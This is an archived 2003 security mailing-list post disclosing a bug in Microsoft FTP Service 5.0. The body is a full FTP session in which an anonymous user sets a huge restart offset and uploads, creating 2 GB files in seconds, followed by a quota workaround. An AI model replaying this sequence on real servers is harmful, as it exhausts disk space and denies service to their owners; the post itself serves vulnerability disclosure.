lame ms-ftp large file creation bug

• Previous message: Dan Yefimov: "Re: WTMP file"
• Next in thread: Dave Korn: "Re: lame ms-ftp large file creation bug"
• Maybe reply: Dave Korn: "Re: lame ms-ftp large file creation bug"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: vuln-dev@securityfocus.com
Date: Sat, 08 Nov 2003 16:45:24 -0800

lo all,
bug or feature:
fbi@mindcreeper:~/test$ for i in `seq 1 4` ; do touch heh$i ; done
fbi@mindcreeper:~/test$ ftp 192.168.1.248
Connected to 192.168.1.248.
220 boom Microsoft FTP Service (Version 5.0).
Name (192.168.1.248:fbi): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> cd uploads
250 CWD command successful.
ftp> rest 99999999999999999
restarting at 2147483647. execute get, put or append to initiate transfer
ftp> put heh1
local: heh1 remote: heh1
200 PORT command successful.
350 Restarting at 2147483647.
150 Opening ASCII mode data connection for heh1.
226 Transfer complete.
ftp> rest 9999999999999
restarting at 2147483647. execute get, put or append to initiate transfer
ftp> put heh2
local: heh2 remote: heh2
200 PORT command successful.
350 Restarting at 2147483647.
550 heh2: There is not enough space on the disk.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
11-08-03 07:28PM 10 heh
11-08-03 07:40PM 2147483647 heh1
11-08-03 07:40PM 0 heh2
226 Transfer complete.

2gb files in 2 seconds. My only work around was setting an ntfs level quota on the IUSR_<machinename>.
-wire

--
Visit Things From Another World for the best
comics, movies, toys, collectibles and more.
http://www.tfaw.com/?qt=wmf

• Previous message: Dan Yefimov: "Re: WTMP file"
• Next in thread: Dave Korn: "Re: lame ms-ftp large file creation bug"
• Maybe reply: Dave Korn: "Re: lame ms-ftp large file creation bug"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]